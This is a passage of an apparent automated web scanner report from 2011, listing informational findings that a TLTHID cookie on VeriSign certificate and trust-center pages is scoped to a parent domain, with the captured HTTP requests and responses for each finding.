Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 33062

lpConnLib.Process({"ResultSet": {"lpCallId":"361431335564-444301943760","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

9.26. https://ssl-certificate-center.verisign.ch/process/retail/console_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.ch
Path:   /process/retail/console_login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:42 GMT
Server: Apache
Set-Cookie: TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

9.27. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.ch
Path:   /process/retail/production_trial_initial

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/production_trial_initial?productType=HASGCServer&application_locale=VRSN_CH HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:42 GMT
Server: Apache
Set-Cookie: TLTHID=34FAB86EDB2D10DB68C5A5440567C536; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://ssl-certificate-center.verisign.ch/process/retail/production_trial_product_selector?uid=fb69022a800687aee2281387e3be2beb&product=GHAPT001
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


9.28. https://ssl-certificate-center.verisign.com/process/retail/console_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.com
Path:   /process/retail/console_login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:43 GMT
Server: Apache
Set-Cookie: TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

9.29. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.com
Path:   /process/retail/production_trial_initial

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/production_trial_initial HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:44 GMT
Server: Apache
Set-Cookie: TLTHID=35B1A6C8DB2D10DB52919F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://ssl-certificate-center.verisign.com/process/retail/production_trial_product_selector?uid=21e134a09c6b802996d1066fe9c13ef5&product=GSPT001
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


9.30. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.com
Path:   /process/retail/trustseal_trial_initial

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trustseal_trial_initial HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:45 GMT
Server: Apache
Set-Cookie: TLTHID=36315378DB2D10DB52939F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_new_account?uid=9e535ad90e202dd2be1657e6ee2caf70&product=TRUSTSEALTRIAL
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


9.31. https://trust-center.verisign.ch/process/retail/console_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.ch
Path:   /process/retail/console_login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:46 GMT
Server: Apache
Set-Cookie: TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

9.32. https://trust-center.verisign.ch/process/retail/trust_initial

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.ch
Path:   /process/retail/trust_initial

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain (see the Set-Cookie header with a Domain attribute in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_initial HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:46 GMT
Server: Apache
Set-Cookie: TLTHID=372B7DB2DB2D10DB60DBD1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.ch/process/retail/trust_product_selector?uid=2f451e38320cb4cf9a868171c06fe1c9&product=TRUSTSEAL001
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


9.33. https://trust-center.verisign.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /favicon.ico

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain (see the Set-Cookie header with a Domain attribute in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:45 GMT
Server: Apache
Set-Cookie: TLTHID=6B107EF0DB2A10DB6A8ACEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:07 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 4710
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/x-icon

...... ..........F... ......................h...............(...>...(... ...@.......................................            ................. !....)...9.'&'.(*&.)*(.44-.=?8.BC?...U...]...a.        d...i.    .h...
...[SNIP]...

9.34. https://trust-center.verisign.com/process/retail/console_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/console_login

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain (see the Set-Cookie header with a Domain attribute in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:48 GMT
Server: Apache
Set-Cookie: TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 12062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

9.35. https://trust-center.verisign.com/process/retail/help_and_support

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/help_and_support

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain (see the Set-Cookie header with a Domain attribute in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/help_and_support HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:53 GMT
Server: Apache
Set-Cookie: TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 138732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

9.36. https://trust-center.verisign.com/process/retail/redirect

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/redirect

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain (see the Set-Cookie header with a Domain attribute in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/redirect HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:00 GMT
Server: Apache
Set-Cookie: TLTHID=3F6ECAD8DB2D10DB52FC9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.com/process/retail/console_home?uid=a5f0b94a4c89f47ae217b662fc5fdac5
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


9.37. https://trust-center.verisign.com/process/retail/session_timeout

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/session_timeout

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain (see the Set-Cookie header with a Domain attribute in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/session_timeout HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vtrh54nwcc; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=03CA6F76DB2F10DB4BFEB1847A7DDBAF

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:59:40 GMT
Server: Apache
Set-Cookie: TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Set-Cookie: JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; Path=/; Secure
Location: http://www.verisign.com/ssl/buy-ssl-certificates/index.html
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html


9.38. https://trust-center.verisign.com/process/retail/trust_initial

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/trust_initial

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain (see the Set-Cookie header with a Domain attribute in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_initial?application_locale=VTC_US&promoCode=TSAB9999&UI=PPT HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:26:31 GMT
Server: Apache
Set-Cookie: TLTHID=62F38DA2DB2A10DB4CE59F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.com/process/retail/trust_product_selector?uid=54e97416d385e356d49a079c459d836b&product=TRUSTSEAL001
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html


9.39. https://trust-center.verisign.com/process/retail/trust_product_selector

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/trust_product_selector

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain (see the Set-Cookie header with a Domain attribute in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTHID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 41019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...

9.40. https://trust-center.verisign.com/process/retail/trust_product_selector.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/trust_product_selector.do

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain (see the Set-Cookie header with a Domain attribute in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_product_selector.do HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:02 GMT
Server: Apache
Set-Cookie: TLTHID=40B2C62EDB2D10DB53169F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.com/process/retail/trust_capture_tech_contact_details?uid=25a7ccba99f4ee1a587cdec832e34e73
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


9.41. https://trust-center.verisign.com/rcm/TeaLeafTarget.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/TeaLeafTarget.html

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain (see the Set-Cookie header with a Domain attribute in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /rcm/TeaLeafTarget.html HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
Content-Length: 1103
X-TeaLeaf-Page-Objects: 0
Origin: https://trust-center.verisign.com
X-TeaLeaf-Page-Img-Fail: 1
X-TeaLeaf-Page-Render: 123
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.11.17.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719

<ClientEventSet PostTimeStamp="1315621658502" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID21H27M8S358R0.8013692023232579" TimeDuration="123" DateSince1970="1315621628481" >

...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:10 GMT
Server: Apache
Set-Cookie: TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 32
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<html>
<body>
OK
</body>
</html>

9.42. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/arrow_progressBar_gray.gif

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain (see the Set-Cookie header with a Domain attribute in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/arrow_progressBar_gray.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=69374E24DB2A10DB44BAB1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 91
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a...............................!.......,.......... hs......+RR.N...}...XF.M4....1...;

9.43. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif

Summary

Severity:   Information
